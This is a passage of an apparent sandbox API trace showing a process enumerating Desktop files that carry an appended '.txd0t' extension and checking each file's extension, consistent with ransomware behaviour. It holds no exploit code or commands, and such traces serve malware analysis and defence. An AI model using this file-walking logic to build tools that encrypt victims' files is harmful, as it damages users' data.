ftCreationTime.dwLowDateTime=0x8344ae60, ftCreationTime.dwHighDateTime=0x1d5e98b, ftLastAccessTime.dwLowDateTime=0x5773cb70, ftLastAccessTime.dwHighDateTime=0x1d5e84d, ftLastWriteTime.dwLowDateTime=0x5114291c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x218e, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="R1PzCjuzfThXdK9.ppt.txd0t", cAlternateFileName="R1PZCJ~1.TXD")) returned 1 [0119.313] StrCmpW (psz1="R1PzCjuzfThXdK9.ppt.txd0t", psz2=".") returned 1 [0119.313] StrCmpW (psz1="R1PzCjuzfThXdK9.ppt.txd0t", psz2="..") returned 1 [0119.313] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="R1PzCjuzfThXdK9.ppt.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\R1PzCjuzfThXdK9.ppt.txd0t" [0119.314] PathFindExtensionW (pszPath="R1PzCjuzfThXdK9.ppt.txd0t") returned=".txd0t" [0119.314] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.314] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6dee5590, ftCreationTime.dwHighDateTime=0x1d5ea10, ftLastAccessTime.dwLowDateTime=0x50bf210, ftLastAccessTime.dwHighDateTime=0x1d5e43b, ftLastWriteTime.dwLowDateTime=0x51168ac9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9d2d, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Rud6mibY589Ee3.mkv.txd0t", cAlternateFileName="RUD6MI~1.TXD")) returned 1 [0119.314] StrCmpW (psz1="Rud6mibY589Ee3.mkv.txd0t", psz2=".") returned 1 [0119.314] StrCmpW (psz1="Rud6mibY589Ee3.mkv.txd0t", psz2="..") returned 1 [0119.314] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="Rud6mibY589Ee3.mkv.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\Rud6mibY589Ee3.mkv.txd0t" [0119.314] PathFindExtensionW (pszPath="Rud6mibY589Ee3.mkv.txd0t") returned=".txd0t" [0119.314] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.314] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc974c90, ftCreationTime.dwHighDateTime=0x1d5e782, ftLastAccessTime.dwLowDateTime=0xf811d50, ftLastAccessTime.dwHighDateTime=0x1d5ea54, ftLastWriteTime.dwLowDateTime=0x51168ac9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9345, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="X24_B.gif.txd0t", cAlternateFileName="X24_BG~1.TXD")) returned 1 [0119.314] StrCmpW (psz1="X24_B.gif.txd0t", psz2=".") returned 1 [0119.314] StrCmpW (psz1="X24_B.gif.txd0t", psz2="..") returned 1 [0119.314] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="X24_B.gif.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\X24_B.gif.txd0t" [0119.314] PathFindExtensionW (pszPath="X24_B.gif.txd0t") returned=".txd0t" [0119.314] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.314] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7352e6f0, ftCreationTime.dwHighDateTime=0x1d5e4c9, ftLastAccessTime.dwLowDateTime=0x81b04700, ftLastAccessTime.dwHighDateTime=0x1d5e48e, ftLastWriteTime.dwLowDateTime=0x5118ee47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaaf1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="xs8aVnsK9NnWwoql.png.txd0t", cAlternateFileName="XS8AVN~1.TXD")) returned 1 [0119.314] StrCmpW (psz1="xs8aVnsK9NnWwoql.png.txd0t", psz2=".") returned 1 [0119.314] StrCmpW (psz1="xs8aVnsK9NnWwoql.png.txd0t", psz2="..") returned 1 [0119.314] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="xs8aVnsK9NnWwoql.png.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\xs8aVnsK9NnWwoql.png.txd0t" [0119.314] PathFindExtensionW (pszPath="xs8aVnsK9NnWwoql.png.txd0t") returned=".txd0t" [0119.314] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.314] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcbf2e40, ftCreationTime.dwHighDateTime=0x1d5e4e8, ftLastAccessTime.dwLowDateTime=0x7729f3c0, ftLastAccessTime.dwHighDateTime=0x1d5e1a1, ftLastWriteTime.dwLowDateTime=0x5118ee47, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5ec8, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yGjZ.rtf.txd0t", cAlternateFileName="YGJZRT~1.TXD")) returned 1 [0119.314] StrCmpW (psz1="yGjZ.rtf.txd0t", psz2=".") returned 1 [0119.314] StrCmpW (psz1="yGjZ.rtf.txd0t", psz2="..") returned 1 [0119.314] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.314] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="yGjZ.rtf.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yGjZ.rtf.txd0t" [0119.315] PathFindExtensionW (pszPath="yGjZ.rtf.txd0t") returned=".txd0t" [0119.315] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.315] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a938d0, ftCreationTime.dwHighDateTime=0x1d5f044, ftLastAccessTime.dwLowDateTime=0xab35d760, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x511b4efb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1484c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yKYlr_viA.odt.txd0t", cAlternateFileName="YKYLR_~1.TXD")) returned 1 [0119.315] StrCmpW (psz1="yKYlr_viA.odt.txd0t", psz2=".") returned 1 [0119.315] StrCmpW (psz1="yKYlr_viA.odt.txd0t", psz2="..") returned 1 [0119.315] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop\\T2UrA", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA" [0119.315] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA", psz2="\\", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\" [0119.315] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\", psz2="yKYlr_viA.odt.txd0t", cchMax=1084 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\T2UrA\\yKYlr_viA.odt.txd0t" [0119.315] PathFindExtensionW (pszPath="yKYlr_viA.odt.txd0t") returned=".txd0t" [0119.315] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.315] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a938d0, ftCreationTime.dwHighDateTime=0x1d5f044, ftLastAccessTime.dwLowDateTime=0xab35d760, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x511b4efb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1484c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yKYlr_viA.odt.txd0t", cAlternateFileName="YKYLR_~1.TXD")) returned 0 [0119.315] FindClose (in: hFindFile=0xec1c70 | out: hFindFile=0xec1c70) returned 1 [0119.315] GetProcessHeap () returned 0xe30000 [0119.315] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.315] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c24360, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0xd1e421a0, ftLastAccessTime.dwHighDateTime=0x1d5e5e8, ftLastWriteTime.dwLowDateTime=0x511db202, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12d6c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", cAlternateFileName="TCY_WF~1.TXD")) returned 1 [0119.315] StrCmpW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", psz2=".") returned 1 [0119.315] StrCmpW (psz1="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", psz2="..") returned 1 [0119.315] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.315] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.315] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\tCY_wfmFOaMzCGVNZFEd.m4a.txd0t" [0119.315] PathFindExtensionW (pszPath="tCY_wfmFOaMzCGVNZFEd.m4a.txd0t") returned=".txd0t" [0119.315] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.315] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00db610, ftCreationTime.dwHighDateTime=0x1d5f00a, ftLastAccessTime.dwLowDateTime=0x1f58d860, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x511db202, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf698, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", cAlternateFileName="TLTL7F~1.TXD")) returned 1 [0119.315] StrCmpW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", psz2=".") returned 1 [0119.315] StrCmpW (psz1="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", psz2="..") returned 1 [0119.315] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.315] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.315] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\TLtL7FqQ6HKzRKYgMVx.mp3.txd0t" [0119.315] PathFindExtensionW (pszPath="TLtL7FqQ6HKzRKYgMVx.mp3.txd0t") returned=".txd0t" [0119.315] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.315] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506c6ac0, ftCreationTime.dwHighDateTime=0x1d5ea0b, ftLastAccessTime.dwLowDateTime=0x59cb56b0, ftLastAccessTime.dwHighDateTime=0x1d5e210, ftLastWriteTime.dwLowDateTime=0x5120bf81, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9cac, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="tpWq0W7bdVW50sRvURB.ods.txd0t", cAlternateFileName="TPWQ0W~1.TXD")) returned 1 [0119.316] StrCmpW (psz1="tpWq0W7bdVW50sRvURB.ods.txd0t", psz2=".") returned 1 [0119.316] StrCmpW (psz1="tpWq0W7bdVW50sRvURB.ods.txd0t", psz2="..") returned 1 [0119.316] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="tpWq0W7bdVW50sRvURB.ods.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\tpWq0W7bdVW50sRvURB.ods.txd0t" [0119.316] PathFindExtensionW (pszPath="tpWq0W7bdVW50sRvURB.ods.txd0t") returned=".txd0t" [0119.316] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.316] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27a643a0, ftCreationTime.dwHighDateTime=0x1d5ebea, ftLastAccessTime.dwLowDateTime=0xe444740, ftLastAccessTime.dwHighDateTime=0x1d5e514, ftLastWriteTime.dwLowDateTime=0x51227672, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17820, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", cAlternateFileName="VCBE_S~1.TXD")) returned 1 [0119.316] StrCmpW (psz1="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", psz2=".") returned 1 [0119.316] StrCmpW (psz1="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", psz2="..") returned 1 [0119.316] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="VCbe_Sa0NEidgDcyfgFz.flv.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\VCbe_Sa0NEidgDcyfgFz.flv.txd0t" [0119.316] PathFindExtensionW (pszPath="VCbe_Sa0NEidgDcyfgFz.flv.txd0t") returned=".txd0t" [0119.316] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.316] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c70bd0, ftCreationTime.dwHighDateTime=0x1d5ea5f, ftLastAccessTime.dwLowDateTime=0x2b6dbb40, ftLastAccessTime.dwHighDateTime=0x1d5f071, ftLastWriteTime.dwLowDateTime=0x5124d96b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x39d5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Vn Oo.gif.txd0t", cAlternateFileName="VNOOGI~1.TXD")) returned 1 [0119.316] StrCmpW (psz1="Vn Oo.gif.txd0t", psz2=".") returned 1 [0119.316] StrCmpW (psz1="Vn Oo.gif.txd0t", psz2="..") returned 1 [0119.316] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Vn Oo.gif.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\Vn Oo.gif.txd0t" [0119.316] PathFindExtensionW (pszPath="Vn Oo.gif.txd0t") returned=".txd0t" [0119.316] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.316] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf874130, ftCreationTime.dwHighDateTime=0x1d5e4bc, ftLastAccessTime.dwLowDateTime=0xae3a4210, ftLastAccessTime.dwHighDateTime=0x1d5e940, ftLastWriteTime.dwLowDateTime=0x5124d96b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16b8a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WDZdqCHFFcmh9_.mp3.txd0t", cAlternateFileName="WDZDQC~1.TXD")) returned 1 [0119.316] StrCmpW (psz1="WDZdqCHFFcmh9_.mp3.txd0t", psz2=".") returned 1 [0119.316] StrCmpW (psz1="WDZdqCHFFcmh9_.mp3.txd0t", psz2="..") returned 1 [0119.316] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.316] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="WDZdqCHFFcmh9_.mp3.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\WDZdqCHFFcmh9_.mp3.txd0t" [0119.316] PathFindExtensionW (pszPath="WDZdqCHFFcmh9_.mp3.txd0t") returned=".txd0t" [0119.316] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.316] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecb52350, ftCreationTime.dwHighDateTime=0x1d5ec3a, ftLastAccessTime.dwLowDateTime=0xf8088120, ftLastAccessTime.dwHighDateTime=0x1d5e8b1, ftLastWriteTime.dwLowDateTime=0x51278258, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x19cb, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="wO3YP7g6H.wav.txd0t", cAlternateFileName="WO3YP7~1.TXD")) returned 1 [0119.316] StrCmpW (psz1="wO3YP7g6H.wav.txd0t", psz2=".") returned 1 [0119.317] StrCmpW (psz1="wO3YP7g6H.wav.txd0t", psz2="..") returned 1 [0119.317] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="wO3YP7g6H.wav.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\wO3YP7g6H.wav.txd0t" [0119.317] PathFindExtensionW (pszPath="wO3YP7g6H.wav.txd0t") returned=".txd0t" [0119.317] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.317] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bf8ae50, ftCreationTime.dwHighDateTime=0x1d5e184, ftLastAccessTime.dwLowDateTime=0xb2d1f1a0, ftLastAccessTime.dwHighDateTime=0x1d5e1f8, ftLastWriteTime.dwLowDateTime=0x51278258, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xee63, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="yn-OCsN4T3Jmv.wav.txd0t", cAlternateFileName="YN-OCS~1.TXD")) returned 1 [0119.317] StrCmpW (psz1="yn-OCsN4T3Jmv.wav.txd0t", psz2=".") returned 1 [0119.317] StrCmpW (psz1="yn-OCsN4T3Jmv.wav.txd0t", psz2="..") returned 1 [0119.317] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="yn-OCsN4T3Jmv.wav.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\yn-OCsN4T3Jmv.wav.txd0t" [0119.317] PathFindExtensionW (pszPath="yn-OCsN4T3Jmv.wav.txd0t") returned=".txd0t" [0119.317] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.317] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x378b4220, ftCreationTime.dwHighDateTime=0x1d5ea0f, ftLastAccessTime.dwLowDateTime=0x50cd2da0, ftLastAccessTime.dwHighDateTime=0x1d5f088, ftLastWriteTime.dwLowDateTime=0x51299e42, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xbe34, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Zau1_Q_6PWntC.gif.txd0t", cAlternateFileName="ZAU1_Q~1.TXD")) returned 1 [0119.317] StrCmpW (psz1="Zau1_Q_6PWntC.gif.txd0t", psz2=".") returned 1 [0119.317] StrCmpW (psz1="Zau1_Q_6PWntC.gif.txd0t", psz2="..") returned 1 [0119.317] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0119.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0119.317] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Zau1_Q_6PWntC.gif.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\Zau1_Q_6PWntC.gif.txd0t" [0119.317] PathFindExtensionW (pszPath="Zau1_Q_6PWntC.gif.txd0t") returned=".txd0t" [0119.317] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.317] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a8b3a60, ftCreationTime.dwHighDateTime=0x1d5e9cf, ftLastAccessTime.dwLowDateTime=0xb6208b00, ftLastAccessTime.dwHighDateTime=0x1d5eaf9, ftLastWriteTime.dwLowDateTime=0x51299e42, 